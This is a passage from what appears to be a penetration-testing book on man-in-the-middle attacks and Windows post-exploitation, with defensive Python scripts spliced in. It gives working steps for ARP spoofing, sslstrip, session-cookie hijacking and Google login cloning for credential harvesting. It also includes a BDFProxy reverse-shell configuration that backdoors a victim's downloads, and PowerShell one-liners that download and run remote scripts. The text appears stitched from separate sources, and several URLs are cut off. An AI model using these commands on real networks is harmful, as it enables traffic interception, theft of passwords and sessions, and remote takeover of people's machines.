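    return {"oper": oper, "sha": _mac(sha), "spa": _ip(spa), "tha": _mac(tha), "tpa": _ip(tpa)}


def _mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def _ip(raw):
    return ".".join(str(b) for b in raw)


def detect_arp_spoofing(frames):
    """Walk ARP replies in order and return alert tuples. An IP that changes MAC can also
    be a legitimate DHCP reassignment, so corroborate before acting; one MAC answering
    for several IPs (the gateway and a host) is the signature of the poisoning above."""
    ip_to_mac, mac_to_ips, alerts = {}, {}, []
    for frame in frames:
        pkt = parse_arp_frame(frame)
        if pkt is None or pkt["oper"] != 2:          # only ARP replies (is-at) matter here
            continue
        ip, mac = pkt["spa"], pkt["sha"]
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(("ip-changed-mac", ip, previous, mac))
        ip_to_mac[ip] = mac
        claimed = mac_to_ips.setdefault(mac, set())
        claimed.add(ip)
        if len(claimed) > 1:
            alerts.append(("mac-claims-multiple-ips", mac, tuple(sorted(claimed))))
    return alerts


# Constructed capture. Ethernet header (dst, src, type) followed by the 28-byte ARP
# reply: htype 1, ptype 0x0800, hlen 6, plen 4, oper 2, sha, spa, tha, tpa.
ARP_REPLY_FIXED = "0001" "0800" "06" "04" "0002"
GW_MAC, HOST_MAC, ATTACKER_MAC = "001122334455", "00aabbccddee", "000c299336f8"
GW_IP, HOST_IP = "0a000101", "0a000107"              # 10.0.1.1 (ROUTE A), 10.0.1.7 (HOST A)


def _frame(dst, src, sha, spa, tha, tpa):
    return bytes.fromhex(dst + src + "0806" + ARP_REPLY_FIXED + sha + spa + tha + tpa)


LEGIT_FRAMES = [
    _frame(HOST_MAC, GW_MAC, GW_MAC, GW_IP, HOST_MAC, HOST_IP),       # router: 10.0.1.1 is-at GW_MAC
    _frame(GW_MAC, HOST_MAC, HOST_MAC, HOST_IP, GW_MAC, GW_IP),       # host: 10.0.1.7 is-at HOST_MAC
]
SPOOFED_FRAMES = [
    _frame(HOST_MAC, ATTACKER_MAC, ATTACKER_MAC, GW_IP, HOST_MAC, HOST_IP),  # HOST B claims the router's IP
    _frame(GW_MAC, ATTACKER_MAC, ATTACKER_MAC, HOST_IP, GW_MAC, GW_IP),      # HOST B claims the host's IP
]

if __name__ == "__main__":
    for alert in detect_arp_spoofing(LEGIT_FRAMES + SPOOFED_FRAMES):
        print("ALERT:", *alert)
```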


Cain and Abel 

(http://www.oxid.it/cain.html) (Windows) 







Download: http://www.oxid.it/cain.html 
Operating System: Windows 


Let's see how we can ARP spoof our victim using Cain and Abel. To successfully ARP spoof in Cain, 
click on the sniffer button at the top-left, then click the sniffer tab and select the Scan MAC Address 
button. 



[Cain and Abel screenshot: Sniffer tab with IP address, MAC address and OUI fingerprint columns, and the context menu offering Remove All, Clear Promiscuous-Mode Results and Export; the Hosts, APR, Routing, Passwords and VoIP tabs are along the bottom] 


Cain and Abel Scanning MAC Addresses 


Next, drop into the ARP tab at the bottom of Cain, select ARP on the left column, and click the "Plus" 
sign at the top bar (one thing to note is that the + button might not be visible. Try to click in the middle 
pane to enable that button). 
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APR List 


This should bring up the IPs from the previous scan and allow you to select the host to ARP Spoof 
and the gateway IP. 
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APR Poison Routing 


Lastly, click on the APR Poisoning start/stop button located at the top menu bar and you are all set. 
[Cain and Abel screenshot: APR tab showing the poisoned route for 192.168.10.163 (MAC C68CC609200A) against the gateway] 

Successful Poisoning 


Now that we have a full MITM ARP Poisoning, we can go look for clear text passwords. You can do 
this by going to the Passwords tab at the bottom of the screen and selecting HTTP or any other clear 
text protocol. 


[Cain and Abel screenshot: Passwords tab with HTTP (3) selected, listing three captures on 19/10/2013 at 12:36 from client 192.168.10.163 to HTTP servers 98.138.253.109, 98.138.252.30 and 98.137.170.32, with the sniffed usernames; FTP (0) and LDAP (0) are empty] 

HTTP Clear Text 


There are many different attacks which can be performed with a full ARP spoof. I will show you a 
couple more examples in this chapter, but I will leave it up to you to figure out what is most 
appropriate for your test. 


Ettercap 

(http://ettercap.github.io/ettercap/) (Kali Linux) 

Download: http://ettercap.github.io/ettercap/ 
Operating System: Kali Linux 


If you favor Linux for providing your ARP spoofing attacks, the old school way is to do this using 
Ettercap. The basic ARP spoof command is: 

• ettercap -TqM arp:remote /10.0.1.1/ /10.0.1.7/ 


This command will perform an ARP spoof against 10.0.1.7 and the gateway 10.0.1.1 using the text 
interface (T) in quiet mode (q) and perform a MITM (M). This means that all of the traffic from 
10.0.1.7 will flow from your computer to the gateway and you will see all of the victim user's traffic. 
If you want to see the traffic natively, you can sniff using tcpdump or Wireshark. 


:-# ettercap -TqM arp:remote /10.0.1.1/ /10.0.1.7/ 

ettercap 0.7.6 copyright 2001-2013 Ettercap Development Team 

Cannot change tcp-segmentation-offload 
Cannot change large-receive-offload 
Could not change any device features 
Listening on: 
eth0 -> 00:0C:29:93:36:F8 

172.16.139.185/255.255.255.0 
fe80::20c:29ff:fe93:36f8/64 

SSL dissection needs a valid 'redir_command_on' script in the ett 
Privileges dropped to UID 65534 GID 65534... 

31 plugins 

43 protocol dissectors 
59 ports monitored 
16074 mac vendor fingerprint 
1766 tcp OS fingerprint 
2183 Known services 

Scanning for merged targets (2 hosts)... 

♦ |==================================================>| 100,00 % 


Ettercap 


Note that there are a lot of different plugins with ettercap and it is very beneficial to understand what 
they do. Once you are within an ettercap MITM attack, you can press the letter "P" to see all of the 
different modules you can load. By pressing "P", you should see the following. 


Example of available plugins: 

[0] arpcop 1.1           Report suspicious ARP activity 
[0] autoadd 1.2          Automatically add new victims in the target range 
[0] chk_poison 1.1       Check if the poisoning had success 
[0] dnsspoof 1.1         Sends spoofed dns replies 
[0] finger 1.6           Fingerprint a remote host 
[0] fingersubmit 1.0     Submit a fingerprint to ettercap's website 
[0] remotebrowser 1.2    Sends visited URLs to the browser 
[0] search_promisc 1.2   Search promisc NICs in the LAN 
[0] smbclear 1.0         Tries to force SMB cleartext auth 
[0] smbdown 1.0          Tries to force SMB to not use NTLM2 key auth 
[0] smurf_attack 1.0     Run a smurf attack against specified hosts 
[0] sslstrip 1.1         SSLStrip plugin 
[0] stpmangler 1.0       Become root of a switches spanning tree 

My favorite attack to perform is the dnsspoof. This allows you to control where your victim goes on 
the Internet. For example, if they go to Gmail, you can redirect the DNS request to point to a web 
server you own and capture the credentials. 

If you want to see this attack in action against software updates, visit my blog post at 
https://www.securepla.net/dont-upgrade-your-software/ where I discuss how to use this in 
combination with Ev
ilgrade to take advantage of poor update implementation processes. But why stop 
there? 


Backdoor Factory Proxy 

(https://github.com/secretsquirrel/BDFProxy) (Kali Linux) 


BDFProxy (https://github.com/secretsquirrel/BDFProxy) is a tool that patches executables with user 
shellcode and allows the executable to perform normally. BDF will write shellcode into empty 
spaces in the binary and hook execution to that code. The best part is that it works automatically on Windows, OS X, 
and Linux. So as long as we can redirect a victim’s traffic through our host, we can manipulate the 
executable before the user receives it. 


• First, we need to modify the config file to include the address of our attacking 
machine: 

o gedit /etc/bdfproxy/bdfproxy.cfg 


bdfproxy.cfg 

CompressedFiles = True #True/False 
[[[LinuxIntelx86]]] 
SHELL = reverse_shell_tcp # This is the BDF syntax 
HOST = 192.168.222.130 
PORT = 8888 
SUPPLIED_SHELLCODE = None 
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax 

BDF Configuration File 


• Run BDFProxy: 

o bdfproxy 

• BDFProxy will create a metasploit resource file. In a new terminal window, input: 

o msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc 

• We also need to configure our firewall to forward all HTTP traffic through the 
mitmproxy: 

o sysctl -w net.ipv4.ip_forward=1 

o iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 

• Lastly, we need to configure the victim host to route through our machine using 
arpspoofing (you can find the gateway and victim IPs with arp -a): 

o arpspoof -i eth0 -t <victim ip> <gateway ip> 
o arpspoof -i eth0 -t <gateway ip> <victim ip> 
[first intercepted response: PATH /themes/default/async/greetings.php, File Size: 1 KB, Not a tar file; passed through unmodified] 

========== RESPONSE ========== 
[*] HOST: 188.165.209.151 
[*] PATH: /rar/winrar-x64-521.exe 
[*] In the backdoor module 
[*] Checking if binary is supported 
[*] Gathering file info 
[*] Reading win64 entry instructions 
[*] Looking for and setting selected shellcode 
[*] Creating win64 resume execution stub 
[*] Creating Code Cave 
[*] Adding a new section to the exe/dll for shellcode injection 
[*] Patching initial entry instructions 
[*] Creating win64 resume execution stub 
[*] Looking for and setting selected shellcode 
[*] Overwriting certificate table pointer 
[*] Patching complete, forwarding to user. 

BDF Patching Binary Executables 

After the file is patched and downloaded, the unknowing victim executes the file. This will spawn off 
either a Meterpreter Shell or just a normal shell based on the type and configuration. In the example 
below, a victim downloaded a normal WinRAR installer and since it did not do any integrity 
checking, we were able to successfully patch the executable. Once executed, the file opens up a shell 
on our Metasploit listener. 
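The integrity check the WinRAR download above lacked, as an added Python example (not from the book or BDFProxy): pin the SHA-256 the vendor publishes out of band and refuse an installer whose PE certificate-table pointer has been zeroed, which is the header BDF's own log says it overwrites. The sample PE image is constructed headers only; a real deployment would also validate the Authenticode signature itself.

```python
"""Integrity checks a downloader can run before executing a fetched installer."""
import hashlib
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # data-directory slot that points at the Authenticode blob


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def certificate_table(data):
    """(file offset, size) of the PE certificate table, (0, 0) when none is attached.
    The signature blob lives outside the sections and this header slot is the only
    reference to it, so a zeroed slot means the loader treats the file as unsigned."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 24                               # 4-byte signature + 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    dir_base = {0x10B: 96, 0x20B: 112}.get(magic)     # PE32 / PE32+ data-directory offsets
    if dir_base is None:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    count = struct.unpack_from("<I", data, opt + dir_base - 4)[0]   # NumberOfRvaAndSizes
    if count <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        return (0, 0)
    return struct.unpack_from("<II", data, opt + dir_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)


def verify_download(data, expected_sha256, expect_signed=True):
    """Pin the out-of-band hash and insist the signature blob is still attached.
    Presence is not validity: run a full Authenticode check (e.g. signtool verify)
    before trusting the file."""
    digest = sha256_hex(data)
    _offset, size = certificate_table(data)
    problems = []
    if digest != expected_sha256.lower():
        problems.append("sha256 mismatch")
    if expect_signed and size == 0:
        problems.append("certificate table is empty")
    return {"sha256": digest, "certificate_bytes": size, "ok": not problems, "problems": problems}


def build_minimal_pe(cert_offset=0, cert_size=0):
    """Constructed headers-only PE32+ image used as sample input (not a runnable binary)."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x22)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                                 # PE32+ magic
    struct.pack_into("<I", opt, 108, 16)                                  # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, cert_offset, cert_size)
    section = b".text\0\0\0" + b"\x00" * 32                               # one empty section header
    return dos + coff + bytes(opt) + section


if __name__ == "__main__":
    signed = build_minimal_pe(0x1000, 0x800)
    pinned = sha256_hex(signed)            # what the vendor would publish alongside the download
    tampered = build_minimal_pe()          # same headers with the certificate pointer zeroed
    print(verify_download(signed, pinned))
    print(verify_download(tampered, pinned))
```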


[*] Started reverse handler on 192.168.1.120:5555 
[*] Starting the payload handler... 
[*] Command shell session 1 opened 
msf exploit(handler) > sessions -l 

Active sessions 
=============== 

  Id  Type           Information                            Connection 
  --  ----           -----------                            ---------- 
  1   shell windows  Microsoft Windows [Version 6.1.7601]   192.168.1.120:5555 -> 192.168.1.110:3371 (192.168.1.110) 

msf exploit(handler) > sessions -i 1 
[*] Starting interaction with 1... 

Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation 

C:\Users\cheetz\Downloads> 

[Victim screenshot: the patched WinRAR 5.21 installer in C:\Users\cheetz\Downloads runs normally and shows its 40-day trial license dialog] 

BDF Shells 


Steps After ARP Spoofing: 

If you successfully ARP-spoofed your victim, you pretty much control where the victim goes, what 
they see, and what protocols they might use, and you see any passwords that might be passed in the clear. Let's 
see some examples which take advantage of these attacks. 


Side Jacking: 

From a high-level view, sidejacking is the process of sniffing the traffic, looking for session tokens 
(cookies), and using those tokens to authenticate as the user. Remember that HTTP is a stateless 
protocol. That means it has to use other methods to track your session without a username/password 
authentication for every page on a web application. After you authenticate the first time, a session 
token will be generated for the whole session and now the token is essentially your authentication 
pass. If that session cookie is compromised, an attacker can take those session tokens, import them 
into their own browser and become you. If you are still unfamiliar with sidejacking, you can visit this 
link for more information: 

http://www.pcworld.com/article/209333/how_to_hijack_facebook_using_firesheep.html 


Hamster/Ferret (Kali Linux) 

Hamster is a tool that allows for these sidejacking attacks. It acts as a proxy server which replaces 
your cookies with session cookies stolen from somebody else, allowing you to hijack their sessions. 
Cookies are sniffed using the Ferret program. 


How to run Hamster/Ferret: 

• First, we enable IP forwarding: 

o echo "1" > /proc/sys/net/ipv4/ip_forward 

• We then modify iptables for SSL Strip: 

o iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000 

• Next, we configure and run SSL Strip: 

o sslstrip -f -a -k -l 1000 -w /root/out.txt & 

• Next, we need to enable ARP spoof (remember this will ARP spoof everyone on the 
network): 

o arpspoof -i eth0 [gateway] 

• Next, we need to enable Ferret. In a new terminal window: 

o ferret -i eth0 

• And finally enable Hamster. In a new terminal window: 

o hamster 


Now, you just need to wait for a victim to go to a website, authenticate or be authenticated, and for 
their cookies to be sniffed. Once you feel you have obtained their cookies, look at the hamster.txt file 
that was created. In the case below, we see that the victim's Reddit cookies were stolen, and these are 
the session tokens that show up in the right-side of the image below. 
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Hamster Results 






With the Reddit session tokens, let's see how we can use them to gain access as that user. I copy the 
redditsession value information and add that into my browser by using a cookie that mimics the 
cookie we stole. I then refresh the page. 


We will use the Firefox Web Developer Add-on which we installed during the setup to analyze and 
add our cookies. We can drop down in the Cookies Menu and click Add Cookie. As you can see 
prior to adding the cookie, I am currently not logged in as any user. After adding a reddit session 
cookie and adding the proper values, I click OK. 
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Replacing Cookies 


Refreshing the page, it looks like we were able to gain access to this account (image below) without 
ever knowing the password! Remember that I am in no way attacking Reddit's site or servers at all. 
The only thing I am doing is sniffing the clear-text traffic, pulling out the cookies, and replacing my 
cookies with those that were sniffed on a network I own. 
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Becoming the Victim User 


Firesheep 

I won't talk much about Firesheep since it is an older tool and similar to the example above; however, 

I just want to point out that the concept still exists today. You can read a little more about it here: 
http://codebutler.com/firesheep/. Firesheep is an add-on tool to Firefox which sniffs the wireless or 
wired networks for session tokens passed in clear. In your browser window, it presents a framed 
page where you can click on a user you captured and become that user instantly. You don't have to 
add any of your own cookies manually, but it only works for a limited number of sites. 


The originating problem is that when session cookies do not have the Secure flag set and the connection is 
not over HTTPS, there is a possibility that the cookies will be passed in the clear. How do you 
check if your cookies are secure? I will first log into my own website and then take a look at my 
cookies. I am using the Web Developer add-on for Firefox to do this. 
[Firefox Web Developer add-on, Cookie Information for www.securepla.net (Security Awareness site)] 

Name: sec1135808350179_mw_session 
Value: 7db3def9c23c7l113def9c23c77dbb7ce 
Host: www.securepla.net 
Path: / 
Expires: At end of session 
Secure: No 
HttpOnly: Yes 

Cookie Information and Secure Cookie 


In the image above, the mwsession token, which is used to keep state for the user, is passed with the 
secure flag off. If the application at any time references information on that page over HTTP or if an 
attacker can force the victim to visit www.securepla.net over HTTP, the attacker will have the full 
session token and be able to take advantage of the user's access. 
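As an added check that is not part of the book and not part of the Web Developer add-on, the Python script below parses raw Set-Cookie headers and reports, per cookie, whether the Secure and HttpOnly flags are set and whether it is a session cookie. The header lines are constructed for the example: the first mirrors the screenshot above (Secure off, HttpOnly on), the second is the same cookie as it should be issued.

```python
"""Audit Set-Cookie headers for the Secure and HttpOnly flags.

Added example (not from the book or from any tool it mentions): given the raw
Set-Cookie headers an application returns, report which cookies would travel
over plain HTTP (no Secure flag) or are readable by script (no HttpOnly), and
which are session cookies. The header lines are constructed for this example.
"""

SAMPLE_HEADERS = [
    # Constructed to match the screenshot: session cookie, Secure=No, HttpOnly=Yes.
    "Set-Cookie: sec1135808350179_mw_session=7db3def9c23c7; Path=/; HttpOnly",
    # The same cookie as it should be issued: Secure and HttpOnly both set.
    "Set-Cookie: sec1135808350179_mw_session=7db3def9c23c7; Path=/; Secure; HttpOnly",
    # A persistent preference cookie with neither flag.
    "Set-Cookie: prefs=dark; Path=/; Expires=Wed, 21 Oct 2015 07:28:00 GMT",
]


def parse_set_cookie(header):
    """Split one Set-Cookie header into name, value and a lower-cased attribute map."""
    if header.lower().startswith("set-cookie:"):
        header = header.split(":", 1)[1]
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        # Flag attributes such as Secure and HttpOnly carry no value; store True.
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_cookie(header):
    """Return the cookie's name, whether it is a session cookie, and missing protections."""
    cookie = parse_set_cookie(header)
    attrs = cookie["attrs"]
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure: sent over plain HTTP")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable by script")
    # No Expires and no Max-Age means the browser keeps it until the session ends.
    is_session = "expires" not in attrs and "max-age" not in attrs
    return {"name": cookie["name"], "session": is_session, "findings": findings}


def audit_headers(headers):
    """Audit every Set-Cookie header and return one result per cookie, in order."""
    return [audit_cookie(h) for h in headers]


if __name__ == "__main__":
    for result in audit_headers(SAMPLE_HEADERS):
        kind = "session" if result["session"] else "persistent"
        status = "; ".join(result["findings"]) or "ok"
        print(f"{result['name']} ({kind}): {status}")
```

A session cookie reported with "missing Secure" is the exact condition the text describes: one HTTP request to the same host is enough for the token to be sent in the clear.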

DNS Redirection: 

If I have a successful MITM within a corporation, one attack that is usually fruitful is to clone the 
intranet page (or any page that requires authentication), then use it for DNS redirection. This is an 
easy way to get usernames and passwords. Let's see a quick example: 

We already know how to configure Cain and Abel to MITM systems in a network from a prior 
example. We will assume you already have a victim routing through you. The next step is to modify 
and spoof DNS requests that happen through the MITM. 


Under the Sniffer top tab and APR bottom tab, click on APR-DNS. Here you can right-click and add 
DNS requests that you want to modify. As mentioned before, I will usually pick an intranet page 
requiring authentication, but in this case, I will spoof Google and their authentication. 
Cain and Abel APR-DNS


The second thing to do is set up a fake page to grab credentials. To clone the site, I generally use the 
Social-Engineer Toolkit (SET) (I will go through a more detailed example later on in the Social 
Engineering Section). Once running within the SET Menu, go to: 1 - Social Engineering Attacks, 2 - 
Website Attack Vectors, 3 - Credential Harvester Attack Method, 2 - Site Cloner. 

In this case, I am going to clone https://accounts.google.com/ServiceLogin, which is the universal 
login page for Google, Gmail, Google+, etc. This is configured on a Kali box that has an IP of 
192.168.0.85. 


   2) Site Cloner 
   3) Custom Import 
  99) Return to Webattack Menu 

set:webattack>2 
[-] Credential harvester will allow you to utilize the clone capabilities within SET 
[-] to harvest credentials or parameters from a website as well as place them into a report 
[-] This option is used for what IP the server will POST to. 
[-] If you're using an external IP, use your external IP for this 
set:webattack> IP address for the POST back in Harvester/Tabnabbing: 192.168.0.85 
[-] SET supports both HTTP and HTTPS 
[-] Example: http://www.thisisafakesite.com 
set:webattack> Enter the url to clone: https://accounts.google.com/ServiceLogin 

[*] Cloning the website: https://accounts.google.com/ServiceLogin 
[*] This could take a little bit... 

192.168.0.90 - - [30/Nov/2013 19:49:55] "GET / HTTP/1.1" 200 - 
192.168.0.90 - - [30/Nov/2013 19:52:17] "GET / HTTP/1.1" 200 - 

Cloning Google's Authentication Page 


We have now configured our DNS spoof and set up a fake page. When the ARP-Spoofed victim 
decides to go to google.com, they will be redirected to our SET-cloned webpage. Any usernames and 
passwords will be printed to our screen and users will then be redirected to the real Google page to 
make it look like the user typed the wrong password. 
Spoofed Google Authentication Page and Victim's Passwords 


SSLStrip: 

SSLStrip is a tool developed by Moxie Marlinspike that redirects a user from an HTTPS page to an 
HTTP site, so that all traffic can be sniffed in clear text. I would first watch Moxie's talk at Black Hat 
(https://www.youtube.com/watch?v=MFol6IMbZ7Y). The tool monitors HTTPS traffic and rewrites 
all HTTPS communication from the user to HTTP (clear text). 


Commands on Kali: 

• echo "1" > /proc/sys/net/ipv4/ip_forward 

• iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 

• sslstrip -l 8080 

• ettercap -TqM arp:remote /192.168.0.12/ /192.168.0.1/ 


In this case, we are spoofing the requests from 192.168.0.12 and the gateway at 192.168.0.1. 








root@kali:~# echo "1" > /proc/sys/net/ipv4/ip_forward 
root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 
root@kali:~# sslstrip -l 8080 

sslstrip 0.9 by Moxie Marlinspike running... 

root@kali:~# ettercap -TqM arp:remote /192.168.0.1/ /192.168.0.12/ 

ettercap 0.7.6 copyright 2001-2013 Ettercap Development Team 

Cannot change tcp-segmentation-offload 
Cannot change large-receive-offload 
Could not change any device features 

Listening on: 
  eth0 -> 00:0C:29:93:36:F8 
          192.168.0.91/255.255.255.0 
          fe80::20c:29ff:fe93:36f8/64 

SSL Strip 


When your victim (192.168.0.12) goes to facebook.com, it will not redirect to the HTTPS version of 
Facebook for the authentication. In the example below, the user goes to Facebook and types their 
username and password. If we go back to the ettercap terminal, we will see the username and 
password scroll through. 



Victim Visiting Facebook.com and Redirected to HTTP and Captured Passwords 


For IPv6 attacks, look at parasite6 in the THC-IPv6 toolkit: 
https://www.thc.org/thc-ipv6/ 


With Any Domain Credentials (Non-Admin): 
Initial System Recon 


So you have compromised your first couple of systems on the SUCK network. The question I get 
asked the most is: What's next? What do I need to do to get more information about the 
system/network and eventually get to the domain admin? You might be on a Windows host and might 
use these few standard queries to get an idea of the environment. 


Windows Enumeration: 

At this point we should know the basic commands like ipconfig, netstat, whoami, etc. to find the basic 
system information. I have compiled most of the basic ones into a single Windows command line: 

• whoami /all && ipconfig /all && netstat -ano && net accounts && net localgroup 
administrators && net share 


But usually for a penetration tester, this isn’t enough. Before we escalate privileges, we need to 
understand our end system and network much better. 

By now, you know that PowerShell is extremely powerful in a Windows environment, especially for 
a penetration tester. The following commands are strictly PowerShell scripts; PowerShell is available 
by default on Windows 7 and higher. 


• Check Windows Patches 

o Most client machines in a network generally have similar patch 
levels. Therefore, compromising a single host will give you an idea of 
what other machines will look like. This is where you can start 
targeting attacks for applications, browsers, etc. 
o powershell.exe -command Get-HotFix 

• Display All AD Users and Associated Information 

o Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch( 
Get-NetUser 

o Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch( 
Get-UserProperties -Properties name,memberof,description,info 
o wmic useraccount get /ALL /format:csv 

• Enable Remote Desktop (requires administrative privileges) 

o Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' 
-Name "fDenyTSConnections" -Value 0 

• Enable the firewall rule for Remote Desktop 

o Enable-NetFirewallRule -DisplayGroup "Remote Desktop" 

• Add a firewall rule 

o powershell.exe -command New-NetFirewallRule -DisplayName 
"Allow Inbound Port 80" -Direction Inbound -LocalPort 80 -Protocol 
TCP -Action Allow 

o powershell.exe -command New-NetFirewallRule -DisplayName 
"Block Outbound Port 80" -Direction Outbound -LocalPort 80 
-Protocol TCP -Action Block 



• View all services 

o powershell.exe -command Get-Service 

• Restart service 

o powershell.exe -command Restart-Service 

• Configure the DNS server 

o powershell.exe -command Set-DnsClientServerAddress -InterfaceAlias "Ethernet" 
-ServerAddresses 8.8.8.8 

• Get a Process Listing 

o powershell.exe -command Get-Process 

o wmic process get caption,executablepath,commandline /format:csv 

• Get a list of all computers from Active Directory 

o Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch( 
Get-NetComputers 

• Collection of information from the system, registries, and other information 

o Powershell.exe -exec bypass IEX "(New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch( 
Information.ps1'); Get-Information" 


Logged in users: 
C:\Windows\system32\config\systemprofile 
C:\Windows\ServiceProfiles\LocalService 
C:\Windows\ServiceProfiles\NetworkService 
C:\Users\cheetz 

Powershell environment: 
Install 
PID 

Putty trusted hosts: 
dss022:securepla.net 
rsa20443:internet-scan.com 
rsa2022:192.168.222.129 
rsa2022:thehackerplaybook.com 
rsa2022:lethalsecurity.com 

Putty saved sessions: 

Recently used commands: 
pbrush\1 
bcadgfe 
cmd\1 
NOTEPAD\1 
\\192.168.1.2 
\\192.168.1.2 
notepad++\1 
calc\1 

Shares on the machine: 


• Search the network for which computers the Domain Admins are using: 

o Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch( 
Invoke-UserHunter 

• Find out which computer a specific AD user is on. In this example, we will look for 
the domain user “domainA” who is a domain administrator: 

o Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch( 
Invoke-UserHunter -UserName "domainA" 


Screenshot: output of Invoke-UserHunter -UserName "domainA". It reports that UserHunter is running 
on the hacker.testlab domain, that the target user is "domainA", and that target user "domainA" has a 
session on and is logged into win7.hacker.testlab. 


• Finding Open Shares: Once on a domain machine, you want to poke around to see 
what's near you and what users are sharing. This will download PowerView and 
search AD for hostnames and query those machines for open shares. From the output 
below, it looks like we have access to the admin shares and full C drives of three 
different hosts. 

o Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch( 
"Invoke-ShareFinder -ExcludeIPC -ExcludePrint -CheckShareAccess | 
Out-File -Encoding ascii found_shares.txt" 
o And when we read found_shares.txt: 
o >type found_shares.txt 

\\win7_123.hacker.testlab\ADMIN$ - Remote Admin 
\\win7_123.hacker.testlab\C$ - Default share 
\\win7_123.hacker.testlab\Users 
\\win7_125.hacker.testlab\ADMIN$ - Remote Admin 
\\win7_125.hacker.testlab\C$ - Default share 
\\win8_100.hacker.testlab\ADMIN$ - Remote Admin 
\\win8_100.hacker.testlab\C$ - Default share 
\\win8_100.hacker.testlab\Users 
\\win8_101.hacker.testlab\ADMIN$ - Remote Admin 
\\win8_101.hacker.testlab\C$ - Default share 

• What if you want to see all the open shares on your network? Generally open shares 
or file shares have tons of goodies stored in them. These can include configuration 
files, passwords, sensitive documents and more. Invoke-Netview, part of the 
PowerTools suite, is a tool that queries the domain for all hosts, and retrieves open 
shares, sessions, and users that are logged on for each host. The original functionality was 
implemented in the netview.exe tool released by Rob Fuller (@mubix). Note that this 
script takes a long time as it tries to connect to every share and is very loud on the 
network. 

o Powershell.exe -exec bypass IEX "(New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch 
Invoke-Netview 

• Another great module of PowerView is the ability to get a list of all Active 
Directory users and the associated information with their accounts. 

o Powershell.exe -exec bypass IEX "(New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch 
Get-UserProperties -Properties name,memberof,description,info" 

• Automate post exploitation information gathering? Try Nishang's Get-Information.ps1 

o Powershell.exe -exec bypass IEX "(New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch( 
Information.ps1');Get-Information" 



The command completed successfully. 

Account Policy: 
Force user logoff how long after time expires?: Never 
Minimum password age (days): 1 
Maximum password age (days): 42 
Minimum password length: 7 
Length of password history maintained: 24 
Lockout threshold: Never 
Lockout duration (minutes): 30 
Lockout observation window (minutes): 30 
Computer role: PRIMARY 
The command completed successfully. 

Local users: 
User accounts for \\WIN-BLN6U6ERSUN 
admin_account    Administrator    bobsmith 
domainadmin      Guest            krbtgt 
pmartian 
The command completed successfully. 

Local Groups: 
Aliases for \\WIN-BLN6U6ERSUN 
*Account Operators 
*Administrators 
*Allowed RODC Password Replication Group 
*Backup Operators 
*Cert Publishers 
*Certificate Service DCOM Access 
*Cryptographic Operators 
*Denied RODC Password Replication Group 
*Distributed COM Users 
*DnsAdmins 
*Event Log Readers 
*Guests 
*IIS_IUSRS 
*Incoming Forest Trust Builders 
*Network Configuration Operators 
*Performance Log Users 
*Performance Monitor Users 
*Pre-Windows 2000 Compatible Access 
*Print Operators 
*RAS and IAS Servers 
*Remote Desktop Users 
*Replicator 
*Server Operators 
*Terminal Server License Servers 
*Users 
*Windows Authorization Access Group 
The command completed successfully. 

WLAN Info: 
The following command was not found: wlan show all. 

C:\Users\nishang> Powershell -ExecutionPolicy bypass -file Get-Information.ps1 


Other Common Non-PowerShell Post Exploitation Commands: 

• Get Local Windows Accounts 

o wmic useraccount get /ALL /format:csv 

• Find Domain Controllers: 

o nltest /DCLIST:[Domain] 

• List Domain Admins and Local Admins: 

o net group "Domain Admins" /domain 
o net localgroup administrators /DOMAIN 


Domain Trusts 

harmj0y has been doing great work this year. One thing that he has been diving into is Windows 
domain trusts. From an offensive perspective, after compromising the first host, you should 
understand the type of infrastructure they use. This means that in large environments, the Active 
